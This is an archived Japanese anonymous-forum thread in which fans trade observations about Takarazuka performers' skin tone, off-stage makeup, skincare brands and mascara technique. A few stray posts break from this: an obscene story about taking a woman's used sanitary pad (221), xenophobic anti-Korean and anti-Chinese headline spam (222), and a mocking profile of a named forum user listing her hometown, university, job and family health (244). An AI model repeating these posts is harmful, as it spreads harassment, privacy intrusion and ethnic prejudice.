藤原さんや嶋田さんのメイク本とか研究してみて〜

153 :名無しさん@花束いっぱい。:2007/01/10(水) 20:44:56 ID:etExfj1r
>152
くまもシミも無いけど、毛穴だらけの肌はどうしたらいいのさ

154 :名無しさん@花束いっぱい。:2007/01/10(水) 23:14:10 ID:I3/TjWPn
それを埋める化粧品もあるんだよ。
後は収斂化粧水だと思う。
しばらく使ってたら、毛穴も小さくなる。


155 :名無しさん@花束いっぱい。:2007/01/14(日) 09:00:26 ID:Kb044NJf
age
生徒さんて普段はチークなしだよね?
梨花みたいなおてもやんはあまりいない→(●^・_・^●)
          ↑タニとかなみんじゃないよ

156 :名無しさん@花束いっぱい。:2007/01/14(日) 11:16:17 ID:J7nbHlOa
チーク入れてる人も多いよ。
オレンジとかブラウン系のをいれてるから、
分かり辛いかもしれないけど。

157 :名無しさん@花束いっぱい。:2007/01/14(日) 12:54:44 ID:+jxqKttp
まとぶん、色白過ぎてびっくりした。しかしジェンヌは皆肌綺麗だ。

158 :名無しさん@花束いっぱい。:2007/01/14(日) 13:39:19 ID:Hak3P5P+
愛短で星組の入りを初めて見たけど、男役の方(名前分かんないけど)がすっごいチーク入れててビックリした。舞台化粧並だった。

159 :名無しさん@花束いっぱい。:2007/01/14(日) 21:07:41 ID:ig+6hdFu
>ジェンヌは皆肌綺麗だ。

んなこたないw
間近で見るとびっくりするような人結構いるよ
こないだ某路線男役とすれ違った時
ほっぺが赤いブツブツだらけで気の毒なほどだった

160 :名無しさん@花束いっぱい。:2007/01/15(月) 00:15:35 ID:VfdgHlid
>>159
そうそう、意外と肌が荒れてる人も多い。

私はタニの色白さにびっくりした。
別にタニファンってわけじゃないけど、思わず
「雪のような肌、血のような唇、黒檀のような黒い髪」という白雪姫の描写を思い出したよ・・・

161 :名無しさん@花束いっぱい。:2007/01/15(月) 18:58:39 ID:fug6RPv4
下地って重要なんだね。ジェンヌも塗ってるのかな。
となみは元々肌綺麗だし、あすか彩音は薄いかな。かなみは濃いけど気になる。
何をどういう順番で塗ってるか知りたい〜

162 :名無しさん@花束いっぱい。:2007/01/18(木) 21:03:47 ID:+Mbwj9kH
みんな肌きれいだけど、スッピンだと意外と汚いのかな?
メイク厚塗りして誤魔化してるの??

163 :名無しさん@花束いっぱい。:2007/01/19(金) 01:38:22 ID:Ssv0+k+q
>160
私も。
生徒に色白な人が多いとは思うけど
肌がきれいな人が多いとは思ったことないなー

159が言うように肌荒れまくった生徒を見て
こんなに荒れた上から厚塗りの舞台化粧をせにゃならんのか・・・と
かわいそうになったよ。

164 :名無しさん@花束いっぱい。:2007/01/19(金) 21:31:28 ID:KwjcYE7r
厚塗りの舞台化粧するから、荒れるんじゃねー?
にわとりとたまごだけど。

165 :名無しさん@花束いっぱい。:2007/02/18(日) 09:13:32 ID:EZWHc8s2
(●▽●)

166 :名無しさん@花束いっぱい。:2007/02/21(水) 00:22:15 ID:vrymwwCV
タニって色白いんだ
他と比べてあんまりそう思ったことなかったわ

167 :名無しさん@花束いっぱい。:2007/02/26(月) 12:16:26 ID:6H1zvvpU
§´°⊇゜`§

168 :名無しさん@花束いっぱい。:2007/02/26(月) 20:43:51 ID:6+EDzbNs
そりゃ毎日A長時間舞台メイクだし、生活不規則そうだし、どんなに肌強くても荒れるよね。
ファンデもねりタイプとかドーランとかだろうし、毛穴埋まりまくってるよね。
ファンが外で待ってると思うとゆっくり落としてお手入れしてなんてできないしね。

だれかオバサマとか高級エステ連れていってディープクリーニング&トリートメントさせてあげてください。

169 :名無しさん@花束いっぱい。:2007/02/26(月) 21:01:39 ID:6+EDzbNs
すいません。
クリーニングじゃなくてクレンジングでした。

170 :名無しさん@花束いっぱい。:2007/02/27(火) 13:27:13 ID:jHlP2ohF
タニが色白?思ったことない。黒くもないけど、普通では。
肌はきれいみたいだけどね。

171 :名無しさん@花束いっぱい。:2007/02/28(水) 00:09:10 ID:qMWHSAoM
肌は綺麗だと思うけど、色白の部類ではないかな。
なんか独特の色味をしてる。

172 :名無しさん@花束いっぱい。:2007/02/28(水) 14:54:45 ID:57G5U9Zo
(´ζ`;).。O○…独特の色味

173 :名無しさん@花束いっぱい。:2007/03/01(木) 02:35:43 ID:xqGSty7V
最近のかなみんて化粧濃いね。

174 :名無しさん@花束いっぱい。:2007/03/01(木) 10:13:09 ID:AjTip0iD
カシゲはスポンサーでもある「禿の素」さんのを使用してるんでしょか?

175 :名無しさん@花束いっぱい。:2007/03/01(木) 10:46:56 ID:7aLFWU91
かなみん、目の下のクマが目だって、
テレビなのに、シミまで見えた。

年上なのに、麻子の方が、肌が綺麗だ・・・

176 :名無しさん@花束いっぱい。:2007/03/01(木) 11:07:03 ID:IF26bMra
タニちゃんはオークル系で、ああいうのは色白とは言わない。
あの位の色味の人で、私は色白ですって言う人が
周りに何人かいるんだけど、首をかしげちゃう。
どっちかというと白い方・・というならまだわかるけど。
本当の色白は、見た時に「白いわね〜」と思わず
言いたくなるような人をさす。


177 :名無しさん@花束いっぱい。:2007/03/01(木) 11:13:10 ID:82sFFqh4
↑コマカイナw

178 :名無しさん@花束いっぱい。:2007/03/01(木) 11:16:40 ID:T16JnreR
東京とか関西の人と東北の人で基準が違うと思う。あたしは東京にいたときによく白いね〜って言われてたけど地元ではそぅでもない。ジェンヌさんくらいの白さならざらにいると思う。特に色白いと思うのはまとぶんとかしちゃんかな?

179 :名無しさん@花束いっぱい。:2007/03/01(木) 11:25:19 ID:+qpI+mrr
星組さんって目の回りの化粧濃いね。
お水っぽいからあまり好きじゃない。

180 :名無しさん@花束いっぱい。:2007/03/01(木) 11:27:53 ID:IF26bMra
>>177 細かくないよ。
多分タニちゃんタイプは日焼けすると黒くなると思う。
本当の色白は、日焼けすると赤くなって黒くなりにくい。

かしちゃんは白いよね〜。まとぶんはよく知らない。

181 :名無しさん@花束いっぱい。:2007/03/01(木) 14:54:03 ID:xqGSty7V
まとぶんとオサは色白。タニは普通じゃね?となみも白いかな…。かしげもまぁ白い方。

182 :名無しさん@花束いっぱい。:2007/03/01(木) 15:02:45 ID:MknQnkNy
かしげは色白だが、合わない色味の服を着ると
恐ろしく顔色がくすむ気がする。特にグリーン。
CSを見ててあんな色黒かったっけか?と思った。

183 :名無しさん@花束いっぱい。:2007/03/01(木) 17:58:27 ID:spsI1Tsc
所でジェンヌさんが使っている、混合肌でも使えるコスメ知ってる方いますか?
出来れば基礎化粧品…

184 :リサ:2007/03/01(木) 19:50:22 ID:Rztpk/Sw
タンタンに貰ったちふれ

185 :名無しさん@花束いっぱい。:2007/03/05(月) 02:19:24 ID:pVMgEduT
かしちゃんはどっちかというと白いかな、って感じ。
私も驚いたのは、やっぱまとぶんの抜けるような白さ。
おささんも同類の白さ。
若手ではチギちゃんがまとぶんぐらい白かった。

186 :名無しさん@花束いっぱい。:2007/03/06(火) 16:15:26 ID:qQqc/4CQ
かなみんは色白くて凄く綺麗なお肌だよね。
何使ってるのか知りたい。

187 :名無しさん@花束いっぱい。:2007/03/07(水) 22:20:45 ID:G0esVfVz
色白スレになってるおー
わたしは色白具合だと
1おさ
2ちぎ
3まと って感じ。
おさは昔から白いが、まとは昔黒かった覚えが・・・

188 :名無しさん@花束いっぱい。:2007/03/19(月) 13:57:36 ID:rV8yEimS
age

189 :名無しさん@花束いっぱい。:2007/03/19(月) 22:31:24 ID:Tol7vFD3
ゆうひくんも色白いとおもう

190 :名無しさん@花束いっぱい:2007/03/19(月) 22:41:36 ID:euQLMTTk
まとは若い頃の趣味は美白と言っておりました。
ちぎとは違ってだんだんに白くなったと思います。
何使ってあんなに白くなったか知りた〜い!

191 :名無しさん@花束いっぱい。:2007/03/19(月) 23:18:23 ID:Ouxj5iE9
水がコムに教えてもらったっていう、今月のグラフに載ってたボディジェルが気になる!
何ていうとこのか知ってる方教えてください。

192 :名無しさん@花束いっぱい。:2007/03/21(水) 21:36:19 ID:jQNRXfQk
>191
コムちゃんがミズに教えたっていう方は
ROGER & GALLET のだと思う。
でも、お店のサイトに行ってもグリーンティのボディジェルが見つからない。
グリーンティのコロンはあったから、シリーズでありそうなんだけどね。
一体どこに行ったら手に入るんだろ?

193 :192:2007/03/21(水) 22:01:03 ID:jQNRXfQk
ゴメンナサイ。
ロジェエガレのグリーンティのジェル
ソニプラにあった・・・orz


194 :名無しさん@花束いっぱい。:2007/03/22(木) 22:33:08 ID:w99oPItO
>192-193
教えてくださりありがとうございます!
早速ソニプラに探しに行ってきます!

195 :名無しさん@花束いっぱい。:2007/03/24(土) 22:52:59 ID:TKwZUkqW
>183
私も知りたい、基礎化粧!!どうしたらあんな綺麗でいられるんだろ?


196 :名無しさん@花束いっぱい。:2007/03/24(土) 22:54:21 ID:TKwZUkqW
ごめん、下げ忘れた…m(_ _)m

197 :名無しさん@花束いっぱい。:2007/03/24(土) 23:20:47 ID:OBGXMGQy
便乗して質問です。
ミズさんが愛用している、紫のチューブのボディーソープは【マチス】というブランドのものみたいですが、ブランドサイトを見ても見つかりません。これもソニプラなどにありますか??

198 :名無しさん@花束いっぱい。:2007/03/25(日) 01:16:20 ID:gNdLbvAo
>197さん
フランスのエステサロン向け高級コスメブランドらしいです。
使用してるサロンや高級スパなら購入出来るかもです。ネットで買えないか探してやっと見つけたら、5040円となってました。
ボディソープにその値段は…私には、不相応。B席観劇して美味しい物食べてきまつ。

199 :名無しさん@花束いっぱい。:2007/03/25(日) 01:22:13 ID:V5LFd4PK
オサさんと檀ちゃん愛用のドゥラメールだっけ?
高いクリームだけど評判いいよね。
使ってる人います?

200 :名無しさん@花束いっぱい。:2007/03/25(日) 10:59:05 ID:CO/z0ipu
>198サン
どこのネットショップですか?
マチスの基礎化粧が良さそうだけど使った方います?

201 :名無しさん@花束いっぱい。:2007/03/25(日) 18:48:21 ID:0FSAfLmt
ミズが使ってるMATISのボディソープ
5040円の香りがどんなだか激しく気になるw
まとぶんの美白方法も知りたい!!!
私の中でも、オサチギは元から白い人なイメージです。

202 :名無しさん@花束いっぱい。:2007/03/26(月) 15:36:33 ID:td9yp7CB
レプリークの水さん、肌めちゃくちゃ綺麗だった…。
あれは外部のメイクさんがやったのかも知れないけど、何使ったんだろう。

203 :名無しさん@花束いっぱい。:2007/03/27(火) 00:16:13 ID:NzYZucAy
MATISのシャワージェル
ブルガリプールオムに似たユニセックス系の香りだそうな

204 :名無しさん@花束いっぱい。:2007/03/27(火) 21:00:01 ID:AWfanbQl
>>202メイクとライト効果だね。すごいわー。

205 :名無しさん@花束いっぱい。:2007/03/28(水) 09:08:20 ID:fza2EXWv
>>202
>>204
画像処理じゃないの?

206 :名無しさん@花束いっぱい。:2007/03/29(木) 00:29:40 ID:7WLUh1Gm
>205
正解

207 :名無しさん@花束いっぱい。:2007/03/29(木) 00:47:28 ID:kyc3psGH
そういえば理事のクレーターって
いつのまにか治った?
それとも修正なのかな?

208 :名無しさん@花束いっぱい。:2007/03/29(木) 02:19:04 ID:kQv0mWJG
えりたんも白いと思う。オサまとに負けてなくない?今、花は白いのよ〜w

>201
いくらなんでも美白であそこまで白くならないでしょう。手も足もまっ白だもの。
研3〜4くらいから色白では目立ってたよ。昔は焼いてたんじゃないの?
秋田出身だって聞いたから地黒ならぬ地白wだったとか。

209 :名無しさん@花束いっぱい。:2007/03/29(木) 02:22:13 ID:UjJRDdKd
ドゥラメールは劇的な変化はないけど傷跡とかに良いですよ。
使い方は独特だけどサンプル貰ってみても良いかも?又は高いけど小さいやつ一個買うと肌が弱ってるときに便利だよ!

210 :名無しさん@花束いっぱい。:2007/03/29(木) 02:42:52 ID:EVz7KAFb
別ジェンヌの出待ちで何度となくナマまとぶんを至近距離でみてるけど
色白じゃないですよ。


211 :名無しさん@花束いっぱい。:2007/03/29(木) 03:01:31 ID:FZw+P3RM
↑別の人と間違えてるんじゃない?
ジェンヌの中でも白い方だとオモ

212 :名無しさん@花束いっぱい。:2007/03/29(木) 03:05:32 ID:kQv0mWJG
>210
あらそれはシツレイ。ちなみに誰くらいだと色白なの?

213 :名無しさん@花束いっぱい。:2007/03/29(木) 10:04:40 ID:qH7J9iM6
ミリオ、マギー、マサキが使ってる香水教えて〜 
三人のうちどれかが、すごいいい匂いだった!


214 :名無しさん@花束いっぱい。:2007/03/29(木) 10:22:48 ID:wEKNOPUQ
私もまとぶんってそんなにすごく色白だと思わない・・。
おさちゃんも・・。
今、白いなーって思うのは、コマちゃんとチギちゃん。
CSのお稽古場なんかで見ても、すごく白い。


215 :名無しさん@花束いっぱい。:2007/03/29(木) 11:04:19 ID:thcl/Nf0
コマ、チギはホクロがすごく多いイメージ。
色白いとできやすいのかしらね。

216 :名無しさん@花束いっぱい。:2007/03/29(木) 11:53:53 ID:wEKNOPUQ
できやすいのではなく、元々あるものが目立つのだと思いますが。

217 :名無しさん@花束いっぱい。:2007/03/29(木) 19:56:30 ID:CWZ5RBMj
色白の人ってときどきホクロ多い人いるよね。
やっぱりメラニンをくまなく作ってキレイに日焼けするってことができないんだろね。

218 :名無しさん@花束いっぱい。:2007/03/30(金) 09:02:23 ID:IfuJTkTR
色白で顔が丸か四角形はホクロになる。
面長はそばかすになる。

219 :名無しさん@花束いっぱい。:2007/03/30(金) 10:54:30 ID:g3OwtVMn
まとぶんさんは、お母様がたしか秋田の方?

東北系ピンク色白は、30歳くらいからさらに白くなる人が多い。
50歳過ぎてようやくくすみが目立ってくるというスーパーお肌。

220 :名無しさん@花束いっぱい。:2007/03/30(金) 17:16:47 ID:9p+nohDU
ミリオ、マギー、マサキが使ってる生理用品教えて〜 
三人のうち誰かのオリモノが、すごい



いい匂い



だった!

221 :名無しさん@花束いっぱい。:2007/04/04(水) 16:52:31 ID:JSTPDj+E
さてさて、私は昨晩、1人でキャバクラに行ってきました。祐希ちゃんと言う平井理央クリソツのお姉ちゃんを指名し、2時間30くらい密着させて頂きました!
まずはトイレへ。大便器2つあるうち宝箱は共に空を確認。
話の中で彼女が何回もトイレへ行きました。もちろん私も酒に酔った振りしてトイレへ行くこと5回目、彼女の経血がずっしりと染み込んだ重たいナプをゲットしました。
閉店20分前にてのゲットです。

そのナプ、今はビーカーに経血を絞り込み底がヒタヒタになったところで湯船に流し込みました。経血風呂をこれから楽しんで来ま〜す(^-^)v

222 :名無しさん@花束いっぱい。:2007/05/25(金) 18:52:53 ID:7ESrG0NT
ニュースは、毎日見といたほうがいいぞ。

【韓国】毎日10分に一回ずつ発生するレイプ犯罪を防げ!
【韓国】昼夜別なくソウル中心部で活動し増加する売春婦たち・・・中には70代女性や障害者の姿も
【韓国】観光も「日中サンドイッチ」…韓国旅行費用は高く現地は不親切
【日韓】安倍晋三の著書「美しい国へ」は、価値観を共有する「民主国家連帯」から、韓国を除外
【中国】薬物誤用で毎年20万人死亡〜「使用法に問題、有毒な材料が薬に含まれているためではない」
【中国】北京で消費品安全大会「健康被害は中国だけの責任ではない」米国中心の「食品脅威論」を牽制
【マスコミ】テレビ朝日の「腐敗」、次々に告発される…幹部の3千万着服、ギャラ未払い、過剰接待など
【芸能】井川遥、実は台湾系ではなく在日韓国人だった
【犯罪】ペッパーランチ強姦事件、店員は制服のままレイプしていた!ほかにも共犯者?
【犯罪】阪神・辻本投手の父親を逮捕 「神戸港に沈めたろか」と殴る蹴る
【三重】「悪口いわれた」噂に立腹、高校生らが女性の小指を切断

東アジアニュース速報…http://news21.2ch.net/news4plus/
ニュース速報…http://news22.2ch.net/newsplus/


223 :名無しさん@花束いっぱい。:2007/07/05(木) 18:21:32 ID:lIoSFxk+
あげます

224 :名無しさん@花束いっぱい。:2007/07/05(木) 18:39:07 ID:94uPJTGO
某男役
ビオレ…もーさー学年も上になってきたし考えようよ

225 :名無しさん@花束いっぱい。:2007/07/05(木) 19:22:15 ID:zgAocQpX
>224
それって星組?

226 :名無しさん@花束いっぱい。:2007/07/05(木) 21:10:53 ID:bGDQV7Oq
ファンケルのお店で、シナちゃん見た。スキンケアとか使ってるみたいだったよ。ジェンヌさんで使ってる人多いのかな?

227 :名無しさん@花束いっぱい。:2007/07/05(木) 21:43:26 ID:d+eZqEGW
何故ビオレはだめなの?年とったらだめなの?

228 :名無しさん@花束いっぱい。:2007/07/05(木) 22:26:38 ID:2Jjk4/LX
化粧板のヅカスレ

■■宝塚ジェンヌの普段メイクについて
http://life8.2ch.net/test/read.cgi/female/1182334621/

229 :名無しさん@花束いっぱい。:2007/07/17(火) 04:24:39 ID:L6BDuuq6
ビオレと聞いて思い浮かんだのは、あかしw

230 :名無しさん@花束いっぱい。:2007/08/13(月) 13:04:30 ID:RLivkdZ4
去年都内のソニプラでしなちゃんがラブクロのコーナーにいたよ。
白パクトファンデとグロスを見てた。
私は用事あったからじっくり見れなかった…
結局かったのかな

231 :名無しさん@花束いっぱい。:2007/08/20(月) 04:52:33 ID:apChCpgp
>210
それはないだろ…
花贔屓だからムラなら
頻繁に行ってるが。
アナタがそう思うならしょうがないけど
極小数意見だとオモワレ。

232 :名無しさん@花束いっぱい。:2007/09/04(火) 00:19:51 ID:leAF1c0C
ジェンヌのオフ化粧気になるから、あげ

233 :名無しさん@花束いっぱい。:2007/09/04(火) 00:45:23 ID:fdT+Tq0R
ソニプラとかで時々娘役を見かけるけど
なんとなく時間が余ってるから立ち寄ったみたいな雰囲気
やっぱり外資系なのかな
コスメについても詳しそう

234 :名無しさん@花束いっぱい。:2007/09/04(火) 12:22:09 ID:5gjqIzCz
ニュースキンも多いだろうね。

235 :名無しさん@花束いっぱい。:2007/09/05(水) 09:57:54 ID:IPUCYbHm
ジェンヌさんのような肌になりたい・・・

236 :名無しさん@花束いっぱい。:2007/09/06(木) 10:56:48 ID:dlu4kttY
いつも思うんだけど、ゆかりとちえって
なんであんなに下まつげ上手く塗れるん?
あんなに綺麗に塗れないよ、私・・・
ウラヤマシス(´・ω・`)

237 :名無しさん@花束いっぱい。:2007/09/07(金) 21:12:14 ID:NvF8QfdJ
マスカラを縦にして、睫毛に対して横に振るんだよ。
lll I llll lが睫毛で、I がマスカラね。
←→
の方向で動かすの。
これで自分は結構綺麗につくんだどな。
ちなみにデジャブのファイバーウィグ使用。

238 :名無しさん@花束いっぱい。:2007/09/08(土) 18:27:53 ID:AnEIHSOW
下睫毛には下地たっぷり塗ると、液が付きやすくて結構いいよー
で、>237タンが書いてくれたようにマスカラは縦で。
て、もうやってたらスマソ(´・ω・`)

それにしてもゆかりとちえはスゴス…
あと、まさおのパッチリ睫毛もすごいと思う。
娘役並みだけどw

239 :名無しさん@花束いっぱい。:2007/09/10(月) 13:17:10 ID:Zd+TvMdA
あれくらい今の若い子だったら普通にできるw
でもレオンの下まつげは短いのによく頑張ってて凄いと思う

240 :名無しさん@花束いっぱい。:2007/09/10(月) 22:04:51 ID:r/C4dVTw
若い子・・・
ゆかりさんは確かにファッションは若いよね・・・。

241 :名無しさん@花束いっぱい。:2007/09/11(火) 16:23:53 ID:rDDsJ1Xv
>237タン
>238タン
遅くなりましたが・・・
詳しくそして分かりやすく
教えて下さってありがとうございます!

上睫毛は綺麗に塗れるんだけども、
下睫毛がどーも上手く塗れなくて・・・

試してみたら、きれーに塗れましたヽ(´∀`)ノ

242 :名無しさん@花束いっぱい。:2007/09/12(水) 00:24:22 ID:+GLFCSlW
知ってると思うけど、
上睫毛の場合は、横にして、
根元で小刻みに数回振ってから、
すっと睫毛を伸ばすイメージで動かすと、綺麗に付くよ。
マスカラの液が根元にたっぷり、毛先にナチュラルに付くんだよ-。

243 :名無しさん@花束いっぱい。:2007/09/12(水) 21:40:52 ID:S/qdE4Mz
>242さん
>238ですが、下睫毛は塗れるのに上がきちんと塗れなかったのでありがたいです!
試してみます(`・ω・´)

最近、きりやんが涙袋に塗ってるアイカラーが綺麗でいいなと思う。
でもきりやんみたいなくりっとした目じゃないとなあ…と。

244 :化粧下手のキトリン:2007/09/15(土) 12:49:16 ID:3/ocT/3D
墾田永年(別名キトリ・妄想サイトの店長)のスペック
・福岡在住
・福岡女学院大生
・英語でミュージカルをしてますっ♪
・親と同居
・母親が更年期障害
・お金が無い(なけなしのお金で地元の博多座や福岡市民会館に行く)
・福岡市内のホテルでバイト
・大劇場と東宝には殆ど行った事が無い(三階席が無いのを知らない)
・金持ちコンプレックス
・家柄コンプレックス
・宝塚不合格歴あり(心に深い傷を負う)
・虚栄心が非常に強い(貧乏をからかわれるとムキになり見栄を張る)
・虚言癖(親戚OGが興信所に行ってジェンヌの調査を依頼している、現役月組生と知り合い)
・麻子様似
・ときおりあやね似
・好きなカップリング・・麻子様受マンセー
・気分転換はバイトの合間に妄想サイトの晒し活動
・タンタンの人気が妬ましい
・餌を与えないで下さい
つ自演乙


245 :名無しさん@花束いっぱい。:2007/09/19(水) 23:19:25 ID:ZICXWvQy



スイーツ(笑) パスタ(笑) ランチ(笑) セレブ(笑) ビビッド(笑) 女性の鬱(笑) 癒し系(笑)
マイナスイオン(笑)Wハッピー婚(笑)ダイエット(笑)エステ(笑)フェミニン(笑)
専用コスメ(笑) ナチュラルスイーツ(笑) 夏色コスメ(笑) 秋色ファンデ(笑)
レディースプラン(笑)アメニティライフ(笑) 自分らしさを演出(笑) 隠れ家的お店(笑)
マイブーム(笑) 若い女性に人気(笑) 思い切って残業(笑) デキる女性(笑) 岩盤浴(笑)
がんばった自分へのご褒美(笑) 高級ブランドショップ(笑) セルフプレジャー(笑) お忍び(笑)
等身大の自分(笑) ピル(笑) くつろぎインテリア(笑) 常に上目遣い(笑) 愛され上手(笑)
さぁ自分磨きがんばろう!(笑) ロハス(笑) スローフード(笑) デトックス(笑)
ダメージヘア(笑) 納豆で血液サラサラ(笑) 保湿成分配合(笑) ふわモテカール(笑) 
アロマテラピー(笑) 小悪魔メイク(笑) 自立した大人の女性(笑) そんな彼女の普段の顔(笑)
ハッピースピリチュアルメイクアップアドバイザー(笑) スローライフ(笑) ガーリッシュ(笑)
アダルトなショットバー(笑)  流行にキャッチアップ(笑) キラキラ小物(笑) 詰め放題(笑)
モテカワ(笑) ピラティス(笑) ホットヨガ(笑) ハリウッドスターにも大人気(笑)
骨盤体操(笑) くつろぎの温泉宿(笑) ツンデレ系でカレの気を引いちゃえ!(笑) 艶女(笑)
キッチュなサーフガール(笑) 酸素バー(笑) 可愛い顔が台無しだぞ!(笑) かわいい(笑)
鏡に向かって頑張れ私!(笑) Lady nanoty(笑) ヤバイ(笑) キテる(笑) ほっこり(笑) 
ハニートラップ(笑) 女だけで、楽しむ。(笑) 新定番(ニュースタンダード)ヒロイン(笑)
春色フルーツカラー配色レッスン(笑) ヲタージョ(笑) ワーキングビューティー(笑)
ワザあり!下着(笑) 着回しトップス(笑) 






246 :名無しさん@花束いっぱい。:2007/10/23(火) 09:07:32 ID:MlLLxzHA
何かネタないかな?

247 :名無しさん@花束いっぱい。:2007/10/23(火) 10:35:50 ID:QxsRPo0O
チギのナチュラルメイクはキレイだと思った。
素顔に自信が・・・・?


248 :名無しさん@花束いっぱい。:2007/10/23(火) 23:59:52 ID:WJNoEOox
楽屋じゃ、割とオードムーゲつかってる人多いよね〜<化粧水

249 :名無しさん@花束いっぱい。:2007/11/30(金) 02:08:32 ID:C0rToa6H
あげ

250 :名無しさん@花束いっぱい。:2007/11/30(金) 08:30:33 ID:AS5MGaTT
ジルのクリスマスコフレ可愛い
なんか娘役さんが使ったら可愛さ倍増って感じ

251 :りさ大好きっ娘:2008/01/20(日) 01:17:26 ID:8zpyirIN
りさ愛用の化粧水教えて。(^3^)-☆chu!!

252 :名無しさん@花束いっぱい。:2008/02/09(土) 16:58:01 ID:5sTlDbkd
ほしゅ
ジェンヌさんの愛用化粧品特集をグラフとかでやって欲しいね!

253 :名無しさん@花束いっぱい。:2008/02/10(日) 05:49:49 ID:T9er+NCb
今までだとロクシタン(チエ)、ドゥラメール(かな?フランス製の高いやつ)がでてたよね。 自分は一人暮らし学生なんでそんな高いもんは買えない。 おばさまとかに買ってもらうのかな、自分もおばさま欲しいww

254 :名無しさん@花束いっぱい。:2008/02/26(火) 20:45:23 ID:kNMavO+V
ガイチさんのブログで、ゆりちゃんが使っているらしい物が紹介されているね

255 :名無しさん@花束いっぱい。:2008/03/14(金) 04:15:27 ID:wayoJUb5
FRaU4月号P85にまひるちゃん。

DHC オリーブバージンオイル
アユーラ スカルプヴァイタライザー
カバーマーク ブライトニングメイクアップベース
カバーマーク センサリーロゼカラー エクストラフォーミュラ
コリキュアーズ ホットマッサージペースト
クレーム ドゥ・ラ・メール

メイクアップについてではなくスキンケアについて。
カバーマークのものは下地とファンデだけど
なぜか乾燥対策として使っているらしい。

256 :名無しさん@花束いっぱい。:2008/04/18(金) 20:40:33 ID:ZpoA/uR5
⌒⌒●〜*●〜*⌒●〜*⌒●〜*

化粧品って、うさぎを死なせて作ってるんですね・・

 http://www.java-animal.org/

シャンプー リンス、ヘアスプレー、石鹸、洗剤、ハミガキ粉も ですか。

 ▼大手メーカー
P&G(マックスファクター)、カネボウ、ダリヤコーポレーション、ツムラ、日本ゼトック、日本メナード、
アルビオン(アナスイ・エレガンス・ソニアリキエル・ポール&ジョー)、花王、コーセー、サンスター、
資生堂、ホーユー、ポーラ、マンダム、ライオン、ロート製薬、シャネル、日本ロレアル、アスカコーポレーション、ウエラジャパン、
ジョンソンエンドジョンソン、コープ、ノエビア、無印良品、ニッピコラーゲン、再春館製薬所、日興製薬・・etc ・・etc

そんなひどい事は隠してるから、綺麗なイメージばっかりでしたね。
  ショックです。 

もう、動物実験してないメーカーの物しか買う気になりませんね。

可愛いうさぎとかいっぱい殺す資金、渡したくないもん。

 http://www.a-stop.com/stop/pc/genjo/jikken.html

  ほんとにホントにショックです。

今まで知らずに使ってた自分が、こんな事思うのは変なんですかね・・?
 http://blog.goo.ne.jp/grandemperor/e/89d2a14ac41a1ac4e6311f9395182d73

257 :名無しさん@花束いっぱい。:2008/04/18(金) 21:15:43 ID:2HucabV4
二度とウナギ喰うなよ、お前さん

258 :名無しさん@花束いっぱい。:2008/04/19(土) 00:37:03 ID:XyXB9sXu
瞳子さんの普段のアイメイクものが知りたい。
一体何使ったらあんなぱっちり目&まつげばさばさになるんだろう…

259 :名無しさん@花束いっぱい。:2008/04/19(土) 02:05:11 ID:cUfiTt+k
今出てる歌劇のももさりの絵と文に、星組子の美容法が書いてあるね
あまりメーカーまで書いてるのはないけど、とうこは、ハッチ(蜂蜜メーカーから出てる
化粧品にもなる蜂蜜)使ってるんだ

260 :名無しさん@花束いっぱい。:2008/04/21(月) 16:41:25 ID:87OwP2fq
みんな、化粧品で、着色料や香料で、火傷をするような、アレルギー体質になってしまえばいい!!!

261 :名無しさん@花束いっぱい。:2008/04/22(火) 12:08:50 ID:EVrYqRVQ

ど、どないしたん?

262 :名無しさん@花束いっぱい。:2008/05/13(火) 01:02:23 ID:d9GZo3IV
何か情報あったら嬉しいのでage

263 :名無しさん@花束いっぱい。:2008/05/13(火) 01:05:27 ID:k/7E2yDB
>259
山田養蜂場?

264 :名無しさん@花束いっぱい。:2008/05/13(火) 14:37:46 ID:/PjSa9zX
いや、HACHI(ハッチ) だったかな。 
メーカー名がハッチ。
エルメスみたいな紙袋で可愛いんだよ。
お洒落な蜂蜜屋さん。

265 :名無しさん@花束いっぱい。:2008/05/18(日) 23:00:43 ID:vFuTrnIJ
水は最近アイメイク変えたよね、どこの化粧品使ってるんだろ

266 :名無しさん@花束いっぱい。:2008/06/16(月) 09:55:55 ID:6f0yOdLH
この間、うちのカウンターに娘役さんらしき人が来たよ。ちなみにマックスファクターです。

267 :名無しさん@花束いっぱい。:2008/06/22(日) 19:10:55 ID:uECiGTCd
ジェンヌのお茶会いくと肌をまじまじ観察しちゃうww

なんで全然テカらないんだ??
この間あひの茶会いったけどお面みたいな肌の綺麗さだった

268 :名無しさん@花束いっぱい。:2008/07/02(水) 12:00:13 ID:plkJCkqw
あひは確かに肌が綺麗そうだ

269 :名無しさん@花束いっぱい。:2008/08/01(金) 16:14:43 ID:EQAiYGf7
となみさんが使ってる日焼け止めや化粧水、化粧品を教えてください!

270 :名無しさん@花束いっぱい。:2008/08/01(金) 17:24:55 ID:ci94Ge7N
901 名前:名無しさん@花束いっぱい。 :2008/08/01(金) 15:51:40 ID:EQAiYGf7
となみさんが使ってる日焼け止めや化粧水、化粧品を教えてください!

マニアックスレでレスがないからって
すぐ他のスレでマルチやめれ!

271 :名無しさん@花束いっぱい。:2008/08/01(金) 17:30:27 ID:ci94Ge7N
…と思ったら誘導されて来たのか。

272 :名無しさん@花束いっぱい。:2008/08/02(土) 08:59:27 ID:wkjzCyTc
>269
4年くらい前の情報だけどアルビオンって聞いたことがある


273 :名無しさん@花束いっぱい。:2008/08/02(土) 12:08:00 ID:NLgFvD1d
アルビオン使っているジェンヌ多いよね

274 :名無しさん@花束いっぱい。:2008/08/08(金) 15:09:24 ID:bCqPkpMZ
>>272
ありがとうございます!

275 :名無しさん@花束いっぱい。:2008/08/08(金) 23:03:04 ID:EtXVoCfN
確かに生徒って何でテカらないんだ。お茶会でも最後まで綺麗。
何もしてないのに化粧落ちるしテカる自分・・・贔屓よりも若いのにw

276 :名無しさん@花束いっぱい。:2008/08/09(土) 14:05:58 ID:mG+t7g1f
むしろ若いからテカるんじゃない?
ジェンヌは公演中何度もお化粧落としたりしてるから
テカるほど皮脂が残ってないのでは

となみはケーキとかの甘いものが苦手で
果物と野菜をよく食べるらしいから
食生活もあって肌がきれいなのかも
もちろんコスメもいいものを使ってるんだろうけどね

277 :名無しさん@花束いっぱい。:2008/08/09(土) 22:27:24 ID:5JA400yy
>>276
となみ甘いもの苦手なんだ。
ミズは甘いもの好きなのにw
イメージ的には逆だな。
野菜と果物をよく食べて、お稽古or公演で汗流すんだから納得の美肌だ。

278 :名無しさん@花束いっぱい。:2008/08/09(土) 22:42:12 ID:9CtVH9TJ
